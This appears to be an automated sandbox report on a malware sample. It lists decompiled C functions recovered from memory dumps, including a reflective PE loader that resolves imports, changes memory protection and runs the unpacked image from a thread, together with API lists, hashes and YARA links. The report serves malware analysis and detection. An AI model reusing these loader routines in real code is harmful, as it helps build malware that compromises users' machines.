                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 393a9f478412837e96b0475ab1747f243c472596803d33568163cc97fed717c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66313872900119AFCB26DFA5C888CEBBB7AFFC97447144698F9059B210D772DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B816C3, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B816C3(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x2b841c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                                                                                                                                0x02b816c3
                                                                                                                                                                                                                                0x02b816cc
                                                                                                                                                                                                                                0x02b816d1
                                                                                                                                                                                                                                0x02b816d7
                                                                                                                                                                                                                                0x02b816e0
                                                                                                                                                                                                                                0x02b816e6
                                                                                                                                                                                                                                0x02b816e8
                                                                                                                                                                                                                                0x02b816eb
                                                                                                                                                                                                                                0x02b816f0
                                                                                                                                                                                                                                0x02b816f7
                                                                                                                                                                                                                                0x02b816f7
                                                                                                                                                                                                                                0x02b816fb
                                                                                                                                                                                                                                0x02b81701
                                                                                                                                                                                                                                0x02b81706
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8170c
                                                                                                                                                                                                                                0x02b81716
                                                                                                                                                                                                                                0x02b81718
                                                                                                                                                                                                                                0x02b8171b
                                                                                                                                                                                                                                0x02b8171e
                                                                                                                                                                                                                                0x02b81722
                                                                                                                                                                                                                                0x02b8172a
                                                                                                                                                                                                                                0x02b8172c
                                                                                                                                                                                                                                0x02b8172f
                                                                                                                                                                                                                                0x02b81797
                                                                                                                                                                                                                                0x02b81797
                                                                                                                                                                                                                                0x02b8179b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81734
                                                                                                                                                                                                                                0x02b8173a
                                                                                                                                                                                                                                0x02b8173c
                                                                                                                                                                                                                                0x02b8174f
                                                                                                                                                                                                                                0x02b81752
                                                                                                                                                                                                                                0x02b81752
                                                                                                                                                                                                                                0x02b81752
                                                                                                                                                                                                                                0x02b81756
                                                                                                                                                                                                                                0x02b8173e
                                                                                                                                                                                                                                0x02b8173e
                                                                                                                                                                                                                                0x02b81746
                                                                                                                                                                                                                                0x02b81748
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81748
                                                                                                                                                                                                                                0x02b81736
                                                                                                                                                                                                                                0x02b81736
                                                                                                                                                                                                                                0x02b8174a
                                                                                                                                                                                                                                0x02b8174a
                                                                                                                                                                                                                                0x02b8174a
                                                                                                                                                                                                                                0x02b81759
                                                                                                                                                                                                                                0x02b8175c
                                                                                                                                                                                                                                0x02b8175e
                                                                                                                                                                                                                                0x02b81765
                                                                                                                                                                                                                                0x02b81760
                                                                                                                                                                                                                                0x02b81760
                                                                                                                                                                                                                                0x02b81760
                                                                                                                                                                                                                                0x02b8176d
                                                                                                                                                                                                                                0x02b81773
                                                                                                                                                                                                                                0x02b81775
                                                                                                                                                                                                                                0x02b817a5
                                                                                                                                                                                                                                0x02b81777
                                                                                                                                                                                                                                0x02b81777
                                                                                                                                                                                                                                0x02b8177a
                                                                                                                                                                                                                                0x02b8177c
                                                                                                                                                                                                                                0x02b81784
                                                                                                                                                                                                                                0x02b81784
                                                                                                                                                                                                                                0x02b81789
                                                                                                                                                                                                                                0x02b8178b
                                                                                                                                                                                                                                0x02b81792
                                                                                                                                                                                                                                0x02b81794
                                                                                                                                                                                                                                0x02b81794
                                                                                                                                                                                                                                0x02b81794
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81794
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81775
                                                                                                                                                                                                                                0x02b81724
                                                                                                                                                                                                                                0x02b81724
                                                                                                                                                                                                                                0x02b81728
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81728
                                                                                                                                                                                                                                0x02b817a8
                                                                                                                                                                                                                                0x02b817a8
                                                                                                                                                                                                                                0x02b817af
                                                                                                                                                                                                                                0x02b817b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817ba
                                                                                                                                                                                                                                0x02b817c5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817c5
                                                                                                                                                                                                                                0x02b817bc
                                                                                                                                                                                                                                0x02b817bc
                                                                                                                                                                                                                                0x02b817c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817c2
                                                                                                                                                                                                                                0x02b816f0
                                                                                                                                                                                                                                0x02b817c6
                                                                                                                                                                                                                                0x02b817cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 02B816FB
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 02B8176D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2574300362-0
                                                                                                                                                                                                                                • Opcode ID: c1063cadc61a6334a026b84d621bafd45dd121ffa242b551e89cbe7819bae15a
                                                                                                                                                                                                                                • Instruction ID: a3294f64ab7a67c201731879d525e78bbdb7c37b81c0f3a93d7d7b397add9707
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1063cadc61a6334a026b84d621bafd45dd121ffa242b551e89cbe7819bae15a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03117B9E12206DFDB14EF99D890AADB7F9FF04754B1444ADD809EB240E770EA42CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81F7C, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                			E02B81F7C(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x2b841c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45);
				_t18 = E02B81C61( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E02B81AF2(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E02B816C3(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E02B81B7F(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E02B81F0A(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                                                                                                                0x02b81f84
                                                                                                                                                                                                                                0x02b81f86
                                                                                                                                                                                                                                0x02b81fa2
                                                                                                                                                                                                                                0x02b81fb3
                                                                                                                                                                                                                                0x02b81fba
                                                                                                                                                                                                                                0x02b82018
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81fbc
                                                                                                                                                                                                                                0x02b81fbc
                                                                                                                                                                                                                                0x02b81fc6
                                                                                                                                                                                                                                0x02b81fca
                                                                                                                                                                                                                                0x02b81fcf
                                                                                                                                                                                                                                0x02b81fd2
                                                                                                                                                                                                                                0x02b81fd7
                                                                                                                                                                                                                                0x02b81fdb
                                                                                                                                                                                                                                0x02b81fe0
                                                                                                                                                                                                                                0x02b81fe5
                                                                                                                                                                                                                                0x02b81fe9
                                                                                                                                                                                                                                0x02b81fee
                                                                                                                                                                                                                                0x02b81fef
                                                                                                                                                                                                                                0x02b81ff3
                                                                                                                                                                                                                                0x02b81ff8
                                                                                                                                                                                                                                0x02b82000
                                                                                                                                                                                                                                0x02b82000
                                                                                                                                                                                                                                0x02b81ff8
                                                                                                                                                                                                                                0x02b81fe9
                                                                                                                                                                                                                                0x02b81fdb
                                                                                                                                                                                                                                0x02b82002
                                                                                                                                                                                                                                0x02b8200b
                                                                                                                                                                                                                                0x02b8200f
                                                                                                                                                                                                                                0x02b82019
                                                                                                                                                                                                                                0x02b8201f
                                                                                                                                                                                                                                0x02b8201f

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,02B81FB8,?,?,?,?,?,00000002,?,?), ref: 02B81C85
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CA7
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CBD
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CD3
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CE9
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CFF
                                                                                                                                                                                                                                  • Part of subcall function 02B81AF2: memcpy.NTDLL(00000002,?,02B81FC6,?,?,?,?,?,02B81FC6,?,?,?,?,?,?,?), ref: 02B81B29
                                                                                                                                                                                                                                  • Part of subcall function 02B81AF2: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 02B81B5E
                                                                                                                                                                                                                                  • Part of subcall function 02B816C3: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 02B816FB
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 02B81BB8
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 02B81C2D
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: GetLastError.KERNEL32 ref: 02B81C33
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 02B81FFA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 2673762927-1084903527
                                                                                                                                                                                                                                • Opcode ID: b122a361aca7bd04afa9c8628c48901cf36d135efaa18c2d6fb02c0cbf19acd2
                                                                                                                                                                                                                                • Instruction ID: 07834695ae6b84c8ea6034282305ef7543c25f84c95c66da3472207a2f7c7f3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b122a361aca7bd04afa9c8628c48901cf36d135efaa18c2d6fb02c0cbf19acd2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9112B36601315AFD721BA99CC80EAB77BDEF883147000599EE0E97200EBB1EC06CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81064, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81064() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x2b841c4;
				if( *0x2b841ac > 5) {
					_t16 = _t15 + 0x2b850f9;
				} else {
					_t16 = _t15 + 0x2b850b1;
				}
				E02B814A8(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E02B819C5( &_v32,  &_v16,  *0x2b841c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x2b841b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E02B81210(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x2b841b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E02B82065(_t44, _t32 + 4);
						}
					}
					_t25 = E02B81F7C(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                                                                                                                                0x02b8106a
                                                                                                                                                                                                                                0x02b8107b
                                                                                                                                                                                                                                0x02b81085
                                                                                                                                                                                                                                0x02b8107d
                                                                                                                                                                                                                                0x02b8107d
                                                                                                                                                                                                                                0x02b8107d
                                                                                                                                                                                                                                0x02b8108c
                                                                                                                                                                                                                                0x02b81095
                                                                                                                                                                                                                                0x02b8109a
                                                                                                                                                                                                                                0x02b810b8
                                                                                                                                                                                                                                0x02b81114
                                                                                                                                                                                                                                0x02b810ba
                                                                                                                                                                                                                                0x02b810c0
                                                                                                                                                                                                                                0x02b810c6
                                                                                                                                                                                                                                0x02b810d4
                                                                                                                                                                                                                                0x02b810d8
                                                                                                                                                                                                                                0x02b810df
                                                                                                                                                                                                                                0x02b810e8
                                                                                                                                                                                                                                0x02b810ec
                                                                                                                                                                                                                                0x02b810f2
                                                                                                                                                                                                                                0x02b81103
                                                                                                                                                                                                                                0x02b810f4
                                                                                                                                                                                                                                0x02b810fa
                                                                                                                                                                                                                                0x02b810fa
                                                                                                                                                                                                                                0x02b810f2
                                                                                                                                                                                                                                0x02b8110b
                                                                                                                                                                                                                                0x02b8110b
                                                                                                                                                                                                                                0x02b81116

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2636182767-0
                                                                                                                                                                                                                                • Opcode ID: 6683e059c3efbe1d3f8d0b3ba8ab85e1b1966e121c5dfa80469e523f7baa44d1
                                                                                                                                                                                                                                • Instruction ID: 2e87b4e1c0087b01e3c7400a1b587ec45ad639d149e100e1278ab5035a9cc8f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6683e059c3efbe1d3f8d0b3ba8ab85e1b1966e121c5dfa80469e523f7baa44d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14119D71959206ABD711FB68DC49EAB7BEDEB04744F020896F14DE3190E730E586CB52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB1007, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BB2DE9), ref: 02BB1020
                                                                                                                                                                                                                                  • Part of subcall function 02BB6B85: SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB1061
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 1811ad19caea02971ac55536571fbc910e58c639858af5c1fde7f73542baa22b
                                                                                                                                                                                                                                • Instruction ID: e9217a03beaaa4f50580b708d9081449cca9aa16b5e1ddc5739111bf4919e891
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1811ad19caea02971ac55536571fbc910e58c639858af5c1fde7f73542baa22b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E901623691010ABFCB12DFA8D804CEF7BB9EF48750B414462F909E7120E7B0DA25CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB779A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02BB63D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2bbd270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02BB6FA6(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                                                                                                                                0x02bb779a
                                                                                                                                                                                                                                0x02bb77a2
                                                                                                                                                                                                                                0x02bb77b9
                                                                                                                                                                                                                                0x02bb77d4
                                                                                                                                                                                                                                0x02bb77d8
                                                                                                                                                                                                                                0x02bb77dd
                                                                                                                                                                                                                                0x02bb77df
                                                                                                                                                                                                                                0x02bb77f1
                                                                                                                                                                                                                                0x02bb77fd
                                                                                                                                                                                                                                0x02bb77e1
                                                                                                                                                                                                                                0x02bb77e1
                                                                                                                                                                                                                                0x02bb77e6
                                                                                                                                                                                                                                0x02bb77eb
                                                                                                                                                                                                                                0x02bb77eb
                                                                                                                                                                                                                                0x02bb77df
                                                                                                                                                                                                                                0x02bb7803
                                                                                                                                                                                                                                0x02bb7807
                                                                                                                                                                                                                                0x02bb7807
                                                                                                                                                                                                                                0x02bb77ae
                                                                                                                                                                                                                                0x02bb77b3
                                                                                                                                                                                                                                0x02bb77b7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6FA6: SysFreeString.OLEAUT32(00000000), ref: 02BB7009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,02BB296F,?,004F0053,052F9370,00000000,?), ref: 02BB77FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: 8c0cbe8114c307771718755f336dd414f965c0134399083fb5029502b3fd4756
                                                                                                                                                                                                                                • Instruction ID: 058518c75c73cae0f55e128aea4988c071d7449b1d26ac9bc6d995e4eef48eb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c0cbe8114c307771718755f336dd414f965c0134399083fb5029502b3fd4756
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F501EC32500519BBCF239E95CC05EFA7B6AEF44790F048469FE159A520DBB1D960EBD0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB508C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02BB508C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02BB5157(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02BB53BB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                0x02bb5091
                                                                                                                                                                                                                                0x02bb509c
                                                                                                                                                                                                                                0x02bb509e
                                                                                                                                                                                                                                0x02bb50a4
                                                                                                                                                                                                                                0x02bb50a6
                                                                                                                                                                                                                                0x02bb50ab
                                                                                                                                                                                                                                0x02bb50b4
                                                                                                                                                                                                                                0x02bb50b8
                                                                                                                                                                                                                                0x02bb50c1
                                                                                                                                                                                                                                0x02bb50c5
                                                                                                                                                                                                                                0x02bb50d4
                                                                                                                                                                                                                                0x02bb50c7
                                                                                                                                                                                                                                0x02bb50c8
                                                                                                                                                                                                                                0x02bb50cd
                                                                                                                                                                                                                                0x02bb50cd
                                                                                                                                                                                                                                0x02bb50c5
                                                                                                                                                                                                                                0x02bb50b8
                                                                                                                                                                                                                                0x02bb50dd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BBA5F2,747DF710,00000000,?,?,02BBA5F2), ref: 02BB50A4
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BBA5F2,02BBA5F3,?,?,02BBA5F2), ref: 02BB50C1
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 36ee9ce2ad5b09d57e5965b2ea1675b756eb8c5129451a49d4e7d4e7cc78b203
                                                                                                                                                                                                                                • Instruction ID: d14c0acf8d5f2a3e22688f7d202eb8e64c33a8bf04bc490e1f937b057abc6471
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ee9ce2ad5b09d57e5965b2ea1675b756eb8c5129451a49d4e7d4e7cc78b203
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6F05466604109BBEB22D69A8D00FFF76ADDFC5754FA10099B904D7240EAF0DE0587B2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB596A, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
